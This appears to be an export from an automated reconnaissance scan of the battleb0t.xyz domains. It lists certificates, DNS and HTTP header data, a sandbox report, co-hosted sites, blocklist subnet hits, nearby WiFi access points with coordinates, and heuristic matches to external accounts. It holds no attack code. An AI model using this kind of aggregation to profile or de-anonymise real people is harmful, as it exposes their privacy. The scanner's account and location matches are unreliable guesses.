"fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 02:58:53 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 60, u'compromised_hosts': [u'23.227.38.74', u'104.17.25.14', u'104.16.254.71', u'157.240.19.26', u'104.21.88.99', u'34.74.170.74'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.ibisci.com/products/mini-total-rna-kit-blood-cultured-cells?_pos=2&_sid=742ced516&_ss=r&variant=31245650362479&variation=A&utm_campaign=9.14.22%20-%20Total%20RNA%20Blood%20%26%20Cultured%20Cell%20Kits%20%282022-09-14%29&utm_medium=email&utm_source=Biochemistry&_kx=ycAqKZ4PKkvzKzy8p0mk27UtqA5M4LAxjJAh8oW3IJAp2mwP8UbyPKq5lDAQ3sHn.MenwDE', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"r3.o.lencr.org"\n "ocsp.pki.goog"\n "o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_fd0_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4048"\n "IsoScope_fd0_IESQMMUTEX_0_519"\n "IsoScope_fd0_ConnHashTable<4048>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_fd0_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_fd0_IE_EarlyTabStart_0x3f8_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4048"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "ico-select_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"23.227.38.74:443"\n "23.32.45.191:80"\n "104.17.25.14:443"\n "104.16.254.71:443"\n "142.250.217.74:443"\n "142.251.215.234:443"\n "157.240.19.26:443"\n "104.21.88.99:443"\n "18.65.229.84:443"\n "142.250.217.67:80"\n "108.138.90.53:80"\n "18.65.227.165:80"\n "18.65.227.47:80"\n "34.74.170.74:443"\n "142.250.217.67:443"\n "142.251.211.238:443"\n "162.159.138.60:443"\n "157.240.19.35:443"\n "172.253.117.156:443"\n "104.22.79.226:443"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "ico-select_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "timber_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003388]\n "modernizr.min_1_.js" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "21F6638F3EFF36EB5B125F1A8AEF3217" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\21F6638F3EFF36EB5B125F1A8AEF3217]- [targetUID: 00000000-00003388]\n "7cH1v4okm5zmbvwkAx_sfcEuiD8jvvKsOdC5_1_.woff" has type "Web Open Font Format TrueType length 18780 version 1.1"- [targetUID: N/A]\n "NBF07080.txt" has type "ASCII text with very long lines"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NBF07080.txt]- [targetUID: 00000000-00003388]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00004048]\n "spr-07102fd76ff4bc22a3e0c32f0cca9ee51c77c34bbc4bdac79abb48f698de10dd_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003388]\n "7cH1v4okm5zmbvwkAx_sfcEuiD8jvvKcPQ_1_.woff" has type "Web Open Font Format TrueType length 49556 version 1.1"- [targetUID: N/A]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00003388]\n "~DF9A0554BA9241DFC8.TMP" has type "data"- Location: [%TEMP%\\~DF9A0554BA9241DFC8.TMP]- [targetUID: 00000000-00004048]\n "1FEA9A2CFE77A3A9A620E9B3ED01E1C8" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\1FEA9A2CFE77A3A9A620E9B3ED01E1C8]- [targetUID: 00000000-00003388]\n "A16C6C16D94F76E0808C087DFC657D99_298E60D5E528EEA70E86195832615F2E" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\A16C6C16D94F76E0808C087DFC657D99_298E60D5E528EEA70E86195832615F2E]- [targetUID: 00000000-00003388]\n "7cH3v4okm5zmbtYtMeA0FKq0Jjg2drF0feC9hpk_1_.woff" has type "Web Open Font Format TrueType length 19932 version 1.1"- [targetUID: N/A]\n "trekkie.storefront.4e66b7932daba00cfd93bde327ce9e8f09bc9ffe.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "E87CE99F124623F95572A696C80EFCAF_8C73F4A8942021ADC4B0579C4C29CD27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\E87CE99F124623F95572A696C80EFCAF_8C73F4A8942021ADC4B0579C4C29CD27]- [targetUID: 00000000-00003388]\n "Information~Payment~ShopPay.baseline.en.5e80b1ca4b17da5ffb95_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdn.shopify.com" seems to be random\n "cdnjs.cloudflare.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.ibisci.com/products/mini-total-rna-kit-blood-cultured-cells?_pos=2&_sid=742ced516&_ss=r&variant=31245650362479&variation=A&utm_campaign=9.14.22%20-%20Total%20RNA%20Blood%20%26%20Cultured%20Cell%20Kits%20%282022-09-14%29&utm_medium=email&utm_sou"\n Pattern match: "https://www.ibisci.com"\n Heuristic match: "r3.o.lencr.org"\n Heuristic match: "GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgT9t4TzNcNcoWRW2KRZ8hv3DA%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: r3.o.lencr.org"\n Heuristic match: "GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgPlgzh11zofO%2FUOCp2RAH1FpA%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: r3.o.lencr.org"\n Heuristic match: "o.ss2.us"\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"\n Heuristic match: "ocsp.rootg2.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"\n Heuristic match: "ocsp.rootca1.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"\n Heuristic match: "GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgTzV04hPbSHRFbwbEGHB2U3Dw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: r3.o.lencr.org"\n Heuristic match: "ocsp.sca1b.amazontrust.com"\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEApQTAHYfewVihAe3nxBvVw%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"\n | 34.74.170.74 |
| 2023-05-12 03:03:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:10:b4:30:a3:e0:72:2f:ec:4e:bc:95:e3:12:bb:83:8d:6f
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Dec 14 04:12:32 2022 GMT
Not After : Mar 14 04:12:31 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:31:e0:5d:42:f2:be:35:60:b1:bf:3c:dd:6a:3a:
e9:66:ce:65:b9:42:55:e5:1f:5b:0f:4a:7d:d2:dd:
d5:d5:2a:c8:4c:26:cc:d6:24:4c:c6:8a:d7:5d:8d:
ad:45:7b:81:26:49:fc:64:c6:a9:da:25:d4:46:11:
f7:82:81:c2:c2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:9F:0E:73:7B:4F:1D:9B:10:7F:DE:3A:BF:95:29:99:72:64:39:CE
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA384
30:65:02:31:00:fd:8c:78:36:1c:71:84:4d:49:6c:11:58:c6:
12:a3:92:bc:28:1e:bf:5a:97:f1:6e:55:aa:8d:04:5e:52:f5:
43:5c:dd:10:26:0f:9b:fd:e7:99:a4:5c:91:c0:27:5e:27:02:
30:22:c5:07:b7:53:41:96:f1:8f:15:55:83:a7:26:c3:46:10:
aa:c0:ac:d9:d7:56:82:6e:c4:c8:be:12:fb:ae:7f:6d:a8:c6:
0a:3a:a2:c1:f9:63:1b:f1:d2:5d:a4:28:24
|
| 2023-05-12 03:33:37 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx
A`qRWQ
@Qh9'
WYW`Q
6:E<0s
qt2!X
O"Np
/Z9l6
23W4R
p$ke'V
sZSjUQ
S\-up
iTb.T
IDAT?
ZYjy9
k-<Z6
DRZ1s
NLgiN
7jI\k
q8cH$
cG$C:
70/1c
Zmfdc2
FC1Qh
IDATU
aEPq<aF
yPbDap
@j518b
.!5Cw
epCrZ
nYy\o
F'Tjms
s2OUvm
wfD/fG
o-\kY
gGtIx9
t?T x
`q\41
r`qOp
/. rqS
hTKCz
bkV_n
aU9zH
svPOI
LwXr3
L?3t1
V'DYE
78AHzS
h7YIvh-
Xg:5B
jAQY3
<Eh_-
ZJvh1
Q`6Vh
xk1ao
6xyMC
YGH2f?
PbtsQ
vu11h
Ip@ \
x0Er-
ZIuZM<F
HDBs!
D$r"r"r
5e8YW
hd@87
3\-:9
L!sA6z
l ?K8'
Z\1hp
?JWEG5
N@1$!EHq
4 1Qb
IDATae
KJ:. -:.
XWU:\Us
0:HB8
0>>7c
MU0t5
RtVTMT
ktCtE
T1SffT
DoV:LLN
Ey8UQ
xsqO7
DtOJoJ
k Q:1
RS-.7
Ty NW
le1NU
Qt@tBr
3 "B"q
B8!u`
BGt4:
PiZEOK
1VuEE
V2xqwbH
IDAT/v
?KwP0TA
jO/Ty | https://pics.battleb0t.xyz/images/carti_2.PNG |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL-aslan (Net ID: 00:02:CF:83:7F:15) | 40.2024, 29.0398 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:BB:17:A7) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | GitHub (Category: coding)
https://github.com/Altpapier | Altpapier |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | babacan (Net ID: 00:14:C1:20:84:74) | 40.2024, 29.0398 |
| 2023-05-12 03:10:11 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [104.21.0.0/20]
http://www.voipbl.org/update | 104.21.0.0/20 |
| 2023-05-12 03:01:32 | Web Server | No | Tool - WhatWeb | 0 | 0 | 3 | 0 | None | cloudflare | vscode.battleb0t.xyz |
| 2023-05-12 02:56:54 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.6.166 | www.ayhu.xyz |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | GitLab - GitLab Inc. is an open-core company that operates GitLab, a DevOps software package which can develop, secure, and operate software. The open source software project was created by Ukrainian developer Dmytro Zaporozhets and Dutch developer Sytse Sijbrandij. | battleb0t.github.io |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.67 | 34.74.170.74 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Chyoa (Category: XXXPORNXXX)
https://chyoa.com/user/login | login |
| 2023-05-12 02:44:23 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b6:39:33:af:de:1e:32:f3:fc:2e:76:dc:bc:08:51:86:10
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 25 01:39:25 2023 GMT
Not After : May 26 01:39:24 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 25 02:39:25.268 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:87:F6:3C:B2:E0:C2:7B:F4:59:32:49:
FF:84:EE:E1:AC:5D:A1:7E:84:DE:B8:AC:92:3B:97:98:
6D:C7:11:07:D0:02:21:00:8E:A1:79:1C:1F:BD:8E:15:
DE:AB:97:FE:40:E1:D9:C2:1C:3E:55:3D:39:DF:88:B8:
3E:30:32:EA:CF:51:A0:F3
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Feb 25 02:39:25.238 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:C0:CA:4A:3A:01:79:C5:F7:4D:18:6C:
70:E8:74:A4:FC:31:5E:46:FF:DB:BC:55:79:1C:6B:D3:
2A:77:33:92:7D:02:21:00:B3:6C:B3:CD:94:6E:40:07:
54:43:CE:33:E0:3F:C2:49:48:DC:19:23:44:E4:9D:8B:
7E:E1:7F:46:CE:18:EF:B6
Signature Algorithm: sha256WithRSAEncryption
b2:e3:a8:2c:e5:ba:7b:3e:8e:fb:de:05:c9:db:df:10:e1:3a:
4a:d4:c8:e9:16:76:31:31:b8:1d:87:e3:42:15:5c:d9:01:d1:
e3:21:14:96:0d:03:d6:ab:2a:bb:6e:da:97:10:fe:b1:03:48:
ab:7e:6d:7b:96:6d:e0:3a:5a:e9:94:2e:83:ae:3f:a8:a5:8c:
25:3a:a9:c5:1d:63:8a:0d:55:4d:54:c8:3a:17:d4:72:72:76:
78:9d:29:2a:3b:de:f5:0a:4c:d8:44:82:1f:1a:29:cc:5c:2c:
bf:7e:db:71:7c:50:e3:91:fe:95:3f:d3:87:5f:30:37:48:ec:
63:b6:a1:ac:33:ac:63:05:b2:8f:6d:ee:9e:2e:ac:50:59:e9:
41:46:d2:71:65:05:17:42:d9:3e:21:9d:d7:90:39:a6:8f:2d:
e8:4a:d4:ff:6d:9e:32:c6:82:05:8f:a4:b5:74:b4:70:df:28:
4b:50:c8:1b:36:1a:ae:cf:7b:ab:92:23:e6:77:97:f2:47:a4:
b0:52:f2:9d:cf:be:68:a2:8a:f2:2f:f0:66:0b:d3:34:2a:c7:
8a:35:c4:1c:33:2d:e5:90:de:56:a7:97:86:7c:97:c9:45:8f:
99:61:22:00:3d:aa:b2:87:0d:35:bb:4c:f3:f8:1c:f8:99:c1:
e8:d1:30:c6
|
| 2023-05-12 02:45:01 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 185.199.109.153 |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | eliaspinheironeto.github.io | 185.199.110.153 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:29:7A:3C) | 34.0544, -118.244 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 010916hao.github.io | 185.199.111.153 |
| 2023-05-12 02:54:16 | HTTP Headers | No | Web Spider | 6 | 0 | 4 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} | https://oldfluid.battleb0t.xyz/./script.js |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | XFINITY (Net ID: 00:0D:67:8C:21:A9) | 39.0469, -77.4903 |
| 2023-05-12 02:54:30 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 64.226.81.43 |
| 2023-05-12 03:43:45 | Malicious IP on Same Subnet | Yes | CleanTalk Spam List | 0 | 0 | 4 | 0 | None | CleanTalk Spam List [45.131.109.0/24]
https://iplists.firehol.org/files/cleantalk_7d.ipset | 45.131.109.0/24 |
| 2023-05-12 02:52:59 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | Fastly CDN Fastly | www.battleb0t.xyz |
| 2023-05-12 02:53:32 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["E278:52F1:2384BF1:3304643:645CBD7D"], "Age": ["0"], "Vary": ["Accept-Encoding"], "Server": ["GitHub.com"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683799422.885849,VS0,VE32"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["2755bc270974a8f69ac639a54e3259fa11be8083"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "X_Served_By": ["cache-chi-klot8100155-CHI"], "Accept_Ranges": ["bytes"]} | 185.199.111.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SBB (Net ID: 00:02:CF:A7:63:9D) | 40.2024, 29.0398 |
